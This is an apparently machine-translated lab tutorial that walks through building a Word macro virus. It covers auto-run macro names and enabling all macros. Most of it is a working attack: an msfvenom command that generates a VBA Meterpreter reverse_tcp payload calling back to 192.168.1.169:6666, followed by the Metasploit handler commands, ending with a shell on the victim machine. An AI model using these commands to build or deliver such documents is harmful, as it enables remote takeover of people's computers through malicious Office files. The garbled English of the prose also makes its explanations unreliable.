Office macro virus bounce shell experiment

0x00 What is a macro virus

Macro viruses are Word Macro code with malicious behavior embedded in (VBA Code ), When opening with macro virus word When the document , The embedded macro code runs automatically
Word Recognize the following names as automatic macros , Or called “auto” macro , When the corresponding action is executed , Will automatically call the VBA Code .

AutoExec： start-up  Word  Or when loading the global template 
    AutoNew： Every time you create a new document 
    AutoOpen： Every time you open an existing document 
    AutoClose： Every time you close a document 

0x01 Simple experimental environment construction

The environment of this experiment is ：

win_10
word_2013
VM_kali_linux_2018( Bridging mode )

First, in the computer word Trust Center settings , open Start all macros Options , And trust VBA Access to the engineering object model , In order to better view the experimental results .

Macro settings

Select the macro in the developer tool , After editing the macro name and macro location, click Create , Get into VBA Code editing interface .

Macro creation

Code editing interface

0x02 The experiment begins

After the preparatory work , stay kali Use in msfvenom Generate a vba Type of rear door msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.169 LPORT=6666 -f vba -o test.vba

Generate backdoor files

take vba Copy the code in the file into the code editing interface just now , And save .
see windows The host ip Address

ipconfig

stay msf Set native listening in ：

use exploit/multi/handler # Select Ze monitoring module 
set payload windows/meterpreter/reverse_tcp  # Select the same type as the Trojan horse 
set LHOST 192.168.1.169  # Set up this machine ip monitor 
set LPORT 6666  #  Set the local listening port 
exploit  # Perform monitoring 

When windows Open our generated test.docx when ,msf Received from 192.168.1.249 The connection of .

obtain shell